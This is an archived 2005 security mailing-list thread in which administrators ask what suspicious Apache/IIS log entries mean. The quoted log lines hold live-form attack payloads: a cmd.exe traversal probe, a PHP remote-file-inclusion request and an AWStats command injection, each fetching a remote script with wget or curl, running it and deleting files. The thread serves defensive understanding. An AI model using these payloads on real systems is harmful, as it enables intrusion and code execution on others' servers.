RE: GET //awstats.pl? in apache logs

["mail list" <brad.maillist () gmail com>]

Hi all,

I have noticed that same messages turning up in my server logs as well. I
have also noticed a number of other odd entries as well such as the
following:

2005-10-21 14:18:09 192.168.2.100 GET
/scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir 80 - 66.7.71.83 - 404 0 64

2005-10-21 02:09:22 192.168.2.100 GET /web-hints/env.cgi - 80 - 58.51.133.21
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) 404 0 3

As well as a number of long entries such as the following.  

2005-10-23 08:59:10 192.168.2.100 GET /inc/tell_a_friend.inc.php
script_root=http://82.165.168.163/catalog/images/fbi.gif?&cmd=cd%20/tmp;wget
%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;curl%20
-
O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;fetch%
20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;perl%20s
ess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* 80 - 211.38.128.10
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) 200 0 0

I am just wondering what these entries mean.  I can guess what the first two
mean but I want to make sure that I am not going to be compromised.

Thanks in advance,

Brad
http://bradmetz.zapto.org





-----Original Message-----
From: Can't dig that daddy [mailto:cdtdaddy () hotmail it] 
Sent: Monday, October 24, 2005 12:02 PM
To: security-basics () securityfocus com
Subject: Re: GET //awstats.pl? in apache logs

Alle 21:33, venerdì 21 ottobre 2005, Konstantine ha scritto:
> My apache logs show rows after rows of following, all from various IP
> addresses. This started a couple of days ago. I don't have awstats.
> Could somebody tell me what is that? Is there anything I should be
> doing? thanks.K.
> GET
//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://w
> ww.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo|
> HTTP/1.1

Bad news:
http://packetstormsecurity.nl/0501-exploits/AWStatsVulnAnalysis.pdf